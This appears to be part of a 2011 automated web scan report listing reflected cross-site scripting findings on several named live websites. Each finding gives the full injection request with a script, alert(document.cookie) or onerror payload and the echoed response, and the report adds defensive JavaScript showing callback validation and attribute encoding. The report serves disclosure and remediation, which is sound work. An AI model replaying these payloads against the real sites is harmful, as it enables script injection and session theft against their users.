GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 220
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:44 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:44 GMT; Path=/
Set-Cookie: di=%7B%7D..1295460044.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 10:54:33 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:00:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:00:44 GMT
Connection: close

_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment"],"segments" : ["19F"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.28. http://ds.addthis.com/red/psi/sites/www.wileyrein.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wileyrein.com/p.json

Issue detail

The value of the callback request parameter is copied into the response as the name of the JSONP callback function. The payload b5131<script>alert(1)</script>ac69988ca2e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This is the same sink as 4.27, reached through a different site path. The response is again served as text/javascript, so the same content-sniffing caveat applies, and the same fix (reject any callback that is not a plain dotted identifier) covers both.

Request

GET /red/psi/sites/www.wileyrein.com/p.json?callback=_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.wileyrein.com%2Fjsfe969%252522%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253ec77ca9823dd%2Fui.dialog.js&ref=http%3A%2F%2Fburp%2Fshow%2F5&2lh2lm HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:41 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:41 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:00:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:00:41 GMT
Connection: close

_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})
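
The callback reflection in 4.27 and 4.28 is what a JSONP endpoint looks like when it accepts any callback string. The responder below is an added example, not AddThis code: it models the p.json response shape from the two findings, but the identifier rule, the length limit and the headers are this example's choices. It rejects the scanner's payload and anything else that is not a dotted identifier, serves the body with a script content type and nosniff, and escapes the data so the body can never close a script element.

```javascript
// Added example (not AddThis code): a JSONP responder that rejects the
// callback values seen in findings 4.27 and 4.28. The response shape follows
// the p.json responses above; the validation rule and headers are this
// example's choices.

// Callback names are dotted JavaScript identifiers such as "_ate.ad.hpr".
// Anything else is refused outright; there is no safe way to "clean" a
// callback that is going to be emitted as code.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LENGTH = 64;

function isValidCallback(name) {
  return typeof name === 'string' &&
         name.length <= MAX_CALLBACK_LENGTH &&
         CALLBACK_RE.test(name);
}

// JSON that is also safe inside a script body: '<' and '>' become \u escapes
// so the data can never contain </script>, and the two line terminators that
// JSON permits but older JavaScript parsers reject in a literal are escaped too.
function jsonForScript(data) {
  return JSON.stringify(data).replace(/[<>\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// query: parsed query-string object; data: the segment payload to return.
// Returns { status, headers, body } instead of writing to a socket so the
// result can be inspected.
function buildJsonpResponse(query, data) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',  // never let a browser sniff this as HTML
    'Cache-Control': 'no-store',
  };
  if (!isValidCallback(query.callback)) {
    return { status: 400, headers, body: '/* invalid callback */' };
  }
  // The leading comment means the body never starts with caller-chosen bytes.
  const body = '/**/' + query.callback + '(' + jsonForScript(data) + ');';
  return { status: 200, headers, body };
}

// Constructed inputs: the scanner's callback from 4.27 and the legitimate one.
console.log(buildJsonpResponse(
  { callback: '_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68' }, {}).status);
console.log(buildJsonpResponse(
  { callback: '_ate.ad.hpr' }, { urls: [], segments: [], loc: 'x' }).body);
```

Rejecting rather than stripping is deliberate: a callback that is going to be emitted as code has no safe "sanitized" form, and a 400 with a fixed body gives an attacker nothing to shape. The nosniff header closes the direct-navigation case that the scanner's PoC relies on.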

4.29. http://financaspessoais.blog.br/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8184"><script>alert(1)</script>c42c81b1212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8184\"><script>alert(1)</script>c42c81b1212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The backslash in the echoed value is addslashes-style quoting applied to the request (PHP's magic_quotes_gpc behaves this way); a backslash has no meaning to the HTML parser, so the double quote still terminates the action attribute and the script element is parsed as markup. The sink is the form action, which reflects the whole request URI: findings 4.29 through 4.34 are one sink reached through different parameters, and one fix, HTML-attribute-encoding the URI where the action is emitted, closes all of them.

Request

GET /?f8184"><script>alert(1)</script>c42c81b1212=1 HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?f8184\"><script>alert(1)</script>c42c81b1212=1#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.30. http://financaspessoais.blog.br/ [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff57"><script>alert(1)</script>29569e332da was submitted in the utm_campaign parameter. This input was echoed as aff57\"><script>alert(1)</script>29569e332da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57"><script>alert(1)</script>29569e332da HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:50 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57\"><script>alert(1)</script>29569e332da#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.31. http://financaspessoais.blog.br/ [utm_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259b8"><script>alert(1)</script>8849500d1f1 was submitted in the utm_content parameter. This input was echoed as 259b8\"><script>alert(1)</script>8849500d1f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8\"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.32. http://financaspessoais.blog.br/ [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1033"><script>alert(1)</script>f894aad5354 was submitted in the utm_medium parameter. This input was echoed as e1033\"><script>alert(1)</script>f894aad5354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badgee1033"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:02 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badgee1033\"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.33. http://financaspessoais.blog.br/ [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab23b"><script>alert(1)</script>dbf1985e564 was submitted in the utm_source parameter. This input was echoed as ab23b\"><script>alert(1)</script>dbf1985e564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=bloggerab23b"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=bloggerab23b\"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.34. http://financaspessoais.blog.br/ [utm_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45a3"><script>alert(1)</script>2751ef5eaae was submitted in the utm_term parameter. This input was echoed as a45a3\"><script>alert(1)</script>2751ef5eaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3\"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...
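
Findings 4.29 through 4.34 all land in the same form action attribute, and each shows the echoed quote with a backslash in front of it. The script below is an added example, not code from the blog or from the scanner: it reproduces the attribute sink with a constructed request URI carrying the payload from 4.29, quotes it the way addslashes does, and reads the result back with the rule an HTML tokenizer uses for a double-quoted attribute value, beside the same sink with proper attribute encoding.

```javascript
// Added example (not from the scan report or the blog): why addslashes-style
// quoting does not stop attribute breakout, and what does. Reproduces the
// sink in findings 4.29-4.34, a <form action="..."> that echoes the request URI.

// Mimic PHP addslashes()/magic_quotes_gpc: a backslash before ' " \ and NUL.
function addslashes(s) {
  return s.replace(/([\\'"])/g, '\\$1').replace(/\0/g, '\\0');
}

// HTML attribute encoding: every character that can end or alter a
// double-quoted attribute value, or start an entity, becomes an entity.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Decode the five entities htmlAttrEncode emits, as a browser does when it
// reads the attribute value back.
function decodeEntities(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (m, e) => map[e]);
}

// The sink: the template writes whatever it is given straight into the attribute.
function renderForm(actionValue) {
  return '<form action="' + actionValue + '" method="post" class="wpcf7-form">';
}

// Minimal reading of the HTML tokenizer rule for a double-quoted attribute:
// the value runs to the first '"', and a preceding backslash means nothing.
// Returns the value as the browser sees it plus whatever follows the closing
// '>' of the <form> tag, which the browser then parses as markup.
function parseAction(tag) {
  const start = tag.indexOf('action="') + 'action="'.length;
  const end = tag.indexOf('"', start);
  const rest = tag.slice(end + 1);
  const tagClose = rest.indexOf('>');
  return { value: tag.slice(start, end), trailingMarkup: rest.slice(tagClose + 1) };
}

function breakout(tag) {
  return parseAction(tag).trailingMarkup.includes('<script>');
}

// Constructed request URI carrying the scanner's payload from finding 4.29.
const requestUri = '/?f8184"><script>alert(1)</script>c42c81b1212=1';

const vulnerableTag = renderForm(addslashes(requestUri));   // what the blog did
const hardenedTag = renderForm(htmlAttrEncode(requestUri)); // what it should do

console.log('addslashes breaks out:', breakout(vulnerableTag));
console.log('attribute encoding breaks out:', breakout(hardenedTag));
console.log('URI survives encoding:',
  decodeEntities(parseAction(hardenedTag).value) === requestUri);
```

The attribute value the browser actually sees in the vulnerable case is `/?f8184\`, and everything from `<script>` onward is markup; in the hardened case the whole URI is still there, entity-encoded, and decodes back to the original. Quoting functions written for SQL or for a scripting language's own string syntax say nothing about HTML, which is why the encoder has to be chosen by the output context, not the input.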

4.35. http://flowplayer.org/tools/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372 was submitted in the REST URL parameter 1. This input was echoed as 3018b"><img src=a onerror=alert(1)>23dd898c372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the same path is HTML-encoded in the 404 status line but not in the body id attribute: the site encodes at one output point and misses another, which is the usual shape of this bug in templated error pages. 4.36 is the same sink reached through a deeper path.

Request

GET /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /tools3018b&quot;&gt;&lt;img%20src%3da%20onerror%3dalert(1)&gt;23dd898c372/
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:41 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5920


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="tools3018b"><img src=a onerror=alert(1)>23dd898c372" class="msie tools">
...[SNIP]...

4.36. http://flowplayer.org/tools/expose.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/expose.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5 was submitted in the REST URL parameter 1. This input was echoed as f3bd2"><img src=a onerror=alert(1)>edbe5526fa5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /toolsf3bd2&quot;&gt;&lt;img%20src%3da%20onerror%3dalert(1)&gt;edbe5526fa5/expose.html
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:42 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5835


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolsf3bd2"><img src=a onerror=alert(1)>edbe5526fa5_expose" class="msie tools">
...[SNIP]...

4.37. http://guru.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71359'%3balert(1)//beeb76ff9a8 was submitted in the h parameter. This input was echoed as 71359';alert(1)//beeb76ff9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The string being built is itself HTML (an IFRAME tag that the ad loader writes into the page), so the value passes through two contexts, a JavaScript string literal and then an HTML attribute; an encoding that only addresses the string literal leaves the attribute context open once the markup is written. The pid and w parameters (4.38, 4.39) land in the same script.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=94699B6&w=160&h=60071359'%3balert(1)//beeb76ff9a8&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:59 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=94699B6&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="160" HEIGHT="60071359';alert(1)//beeb76ff9a8" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.38. http://guru.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91eec"%3balert(1)//b86b5220098 was submitted in the pid parameter. This input was echoed as 91eec";alert(1)//b86b5220098 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=94699B691eec"%3balert(1)//b86b5220098&w=160&h=600&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:54 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=94699B691eec";alert(1)//b86b5220098&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="160" HEIGHT="600" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.39. http://guru.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 255f6'%3balert(1)//86e0057d261 was submitted in the w parameter. This input was echoed as 255f6';alert(1)//86e0057d261 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=94699B6&w=160255f6'%3balert(1)//86e0057d261&h=600&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:56 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=94699B6&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="160255f6';alert(1)//86e0057d261" HEIGHT="600" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.40. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:23:59 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2zpeeq45alawxszruhbhql55; path=/; HttpOnly
